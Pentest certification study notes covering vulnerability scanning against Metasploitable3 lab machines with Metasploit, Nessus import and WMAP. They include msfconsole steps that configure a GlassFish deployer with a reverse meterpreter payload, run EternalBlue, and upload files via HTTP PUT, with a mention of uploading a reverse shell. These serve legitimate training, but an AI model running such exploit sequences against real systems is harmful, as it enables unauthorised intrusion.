eCPPTv2-PTP-Notes

Vulnerability Scanning


Vulnerability Scanning With MSF

MSF auxiliary and exploit modules can be used to identify inherent vulnerabilities in services, operating systems and web apps.

  • Useful in the Exploitation phase of the pentest

🔬 The Metasploitable3 lab environment will be used for the vulnerability scanning demonstration.

  • Metasploitable3 is a vulnerable virtual machine developed by Rapid7, intended to be used as a vulnerable target for testing exploits with Metasploit.

🔬 You can find my lab installation & configuration with Vagrant on this page, set up for educational purposes.

  • The Kali Linux attacker machine must be configured on the same local network as the Metasploitable3 VMs.

Detect active hosts on the local network, from the Kali VM:

```
sudo nmap -sn 192.168.31.0/24
Nmap scan report for 192.168.31.139   # Linux target
Nmap scan report for 192.168.31.140   # Windows 2008 target
```

  • Run Metasploit:

```
service postgresql start && msfconsole -q
db_status
setg RHOSTS 192.168.31.140
setg RHOST 192.168.31.140
workspace -a VULN_SCAN_MS3
```

  • The service version is a key piece of information for vulnerability scanning. Use the db_nmap command inside msfconsole so the results land in the MSF database:

```
db_nmap -sS -sV -O 192.168.31.140
[*] Nmap: 21/tcp    open  ftp                  Microsoft ftpd
[*] Nmap: 22/tcp    open  ssh                  OpenSSH 7.1 (protocol 2.0)
[*] Nmap: 80/tcp    open  http                 Microsoft IIS httpd 7.5
[*] Nmap: 135/tcp   open  msrpc                Microsoft Windows RPC
[*] Nmap: 139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp   open  microsoft-ds         Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 3306/tcp  open  mysql                MySQL 5.5.20-log
[*] Nmap: 3389/tcp  open  tcpwrapped
[*] Nmap: 4848/tcp  open  ssl/http             Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
[*] Nmap: 7676/tcp  open  java-message-service Java Message Service 301
[*] Nmap: 8009/tcp  open  ajp13                Apache Jserv (Protocol v1.3)
[*] Nmap: 8080/tcp  open  http                 Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
[*] Nmap: 8181/tcp  open  ssl/http             Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
[*] Nmap: 8383/tcp  open  http                 Apache httpd
[*] Nmap: 9200/tcp  open  wap-wsp?
[*] Nmap: 49152/tcp open  msrpc                Microsoft Windows RPC
[*] Nmap: 49153/tcp open  msrpc                Microsoft Windows RPC
[*] Nmap: 49154/tcp open  msrpc                Microsoft Windows RPC
[*] Nmap: 49155/tcp open  msrpc                Microsoft Windows RPC
[...]
hosts
services
```

  • Manually search for a specific exploit

    • Check if there are any exploits for a particular version of a service

```
search type:exploit name:iis
search Sun GlassFish
```

  • Check if a module will work on the specific version of the service

```
use exploit/multi/http/glassfish_deployer
info
# Description:
#   This module logs in to a GlassFish Server (Open Source or
#   Commercial) using various methods (such as authentication bypass,
#   default credentials, or user-supplied login), and deploys a
#   malicious war file in order to get remote code execution. It has
#   been tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System
#   Application Server 9.x. Newer GlassFish versions do not allow remote
#   access (Secure Admin) by default, but is required for exploitation.
set payload windows/meterpreter/reverse_tcp
options
# check the LHOST, LPORT, APP_RPORT, RPORT, PAYLOAD options
```

```
searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"
```

  • Back in msfconsole, check if the server is vulnerable to MS17-010

```
search eternalblue
use auxiliary/scanner/smb/smb_ms17_010
run
use exploit/windows/smb/ms17_010_eternalblue
options
# always check the Payload options
run
```

  • metasploit-autopwn takes a look at the Metasploit database and provides a list of exploit modules to use for the already enumerated services

  • On a Kali terminal

```
wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb
sudo mv db_autopwn.rb /usr/share/metasploit-framework/plugins/
```

  • On msfconsole

```
load db_autopwn
db_autopwn -p -t          # Enumerates exploits for each of the open ports
db_autopwn -p -t -PI 445  # Limit to only the 445 port
```

  • In msfconsole, use the analyze command to automatically analyze the contents of the MSF database (hosts & services), then review the recorded vulnerabilities

```
analyze
vulns
```

VA with Nessus

  • The results of a Nessus vulnerability scan can be imported into the MSF for analysis and exploitation.

  • The free Nessus Essentials version allows scanning up to 16 IPs.

Start Nessus Essentials on the Kali VM, log in, create a New Basic Network Scan and run it. Wait for the scan to finish and export the results with the Export/Nessus button.

[Screenshot: Nessus Essentials - Metasploitable3]

  • Open the msfconsole terminal and import the Nessus results

    • Check the information from the scan results with the hosts, services, vulns commands

```
workspace -a MS3_NESSUS
db_import /home/kali/Downloads/MS3_zph3t5.nessus
hosts
services
vulns
vulns -p 445
search cve:2017 name:smb
search MS12-020
search cve:2019 name:rdp
search cve:2015 name:ManageEngine
search PHP CGI Argument Injection
```
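As an added example (not from the original notes), a small Python parser for the .nessus v2 export format that reproduces the hosts / vulns / `vulns -p 445` view offline, on a constructed sample report with placeholder plugin IDs rather than a real export.

```python
"""Offline summary of a Nessus (.nessus v2) export: the host / service / vuln view
that `db_import` loads into the MSF database, reproduced with stdlib XML parsing."""
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample report (placeholder pluginIDs); not output of a real scan.
SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2><Report name="MS3">
 <ReportHost name="192.168.31.140">
  <HostProperties><tag name="operating-system">Windows Server 2008 R2</tag></HostProperties>
  <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4" pluginID="PLACEHOLDER-1"
              pluginName="MS17-010: Security Update for Microsoft Windows SMB Server">
   <cve>CVE-2017-0144</cve><cve>CVE-2017-0143</cve>
  </ReportItem>
  <ReportItem port="3389" svc_name="msrdp" protocol="tcp" severity="3" pluginID="PLACEHOLDER-2"
              pluginName="MS12-020: Vulnerabilities in Remote Desktop">
   <cve>CVE-2012-0002</cve>
  </ReportItem>
  <ReportItem port="0" svc_name="general" protocol="tcp" severity="0" pluginID="PLACEHOLDER-3"
              pluginName="Nessus Scan Information"/>
 </ReportHost>
</Report></NessusClientData_v2>"""

SEVERITY = {1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

def parse_nessus(xml_text):
    """Return {host: [finding, ...]}; severity-0 (informational) items are dropped, like `vulns`."""
    findings = defaultdict(list)
    for host in ET.fromstring(xml_text).iter("ReportHost"):
        for item in host.iter("ReportItem"):
            sev = int(item.get("severity", "0"))
            if sev == 0:
                continue
            findings[host.get("name")].append({
                "port": int(item.get("port")), "proto": item.get("protocol"),
                "service": item.get("svc_name"), "severity": SEVERITY[sev],
                "name": item.get("pluginName"),
                "cves": sorted(c.text for c in item.findall("cve")),
            })
    return dict(findings)

def vulns_on_port(findings, port):
    """Equivalent of `vulns -p <port>`: findings on one port across all hosts."""
    return [(h, f) for h, fl in findings.items() for f in fl if f["port"] == port]

if __name__ == "__main__":
    for host, fl in parse_nessus(SAMPLE_NESSUS).items():
        for f in fl:
            print(f"{host}:{f['port']}/{f['proto']} [{f['severity']}] {f['name']} {f['cves']}")
```

Point it at a real export by reading the file into `parse_nessus`; the per-port filter is what you would cross-check against `search cve:... name:...` before picking a module.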

VA with WMAP

🗒️ WMAP is a web application vulnerability scanner that allows conducting and automating web server enumeration and scanning from within the Metasploit Framework.

  • Available as a fully integrated MSF plugin

  • Utilizes the built-in MSF auxiliary modules

```
ip -br -c a
192.28.60.3   # Target IP
service postgresql start && msfconsole -q
db_status
setg RHOSTS 192.28.60.3
setg RHOST 192.28.60.3
workspace -a WMAP_SCAN
```

  • Load WMAP extension within msfconsole

```
load wmap
```

  • Add WMAP site

```
wmap_sites -a 192.28.60.3
```

  • Specify the target URL

```
wmap_targets -t http://192.28.60.3
wmap_sites -l
wmap_targets -l
```

  • Show only the MSF modules that can be run against the target

```
wmap_run -t
```

  • Run the web app vulnerability scan

    • this will run all enabled modules against the target web server

```
wmap_run -e
```

  • Analyze the results produced by WMAP.

[Screenshots: wmap_run -t, wmap_run -e]

  • List WMAP found vulnerabilities

```
wmap_vulns -l
```

  • Since the allowed HTTP methods are POST, OPTIONS, GET, HEAD, exploit the vulnerability with the auxiliary/scanner/http/http_put module to upload a file into the /data directory

    • 📌 A reverse shell payload can be uploaded and run on the target.

```
use auxiliary/scanner/http/http_put
options
set PATH /data/
set FILEDATA "File uploaded"
set FILENAME file.txt
run
```

[Screenshot: Metasploit - auxiliary/scanner/http/http_put]

  • Test if the file has been uploaded correctly

```
curl http://192.28.60.3:80/data/file.txt
```

  • Use the searchsploit tool from the Kali terminal, instead of the MSF search command, to display only the Metasploit exploit modules.

  • metasploit-autopwn - a Metasploit plugin for easy exploit & vulnerability attack.

🔬 VA with Nessus: you can find my Nessus Essentials install tutorial here.

🔬 VA with WMAP: the lab is the same one from the HTTP Metasploit Enumeration section above - Metasploit - Apache Enumeration Lab.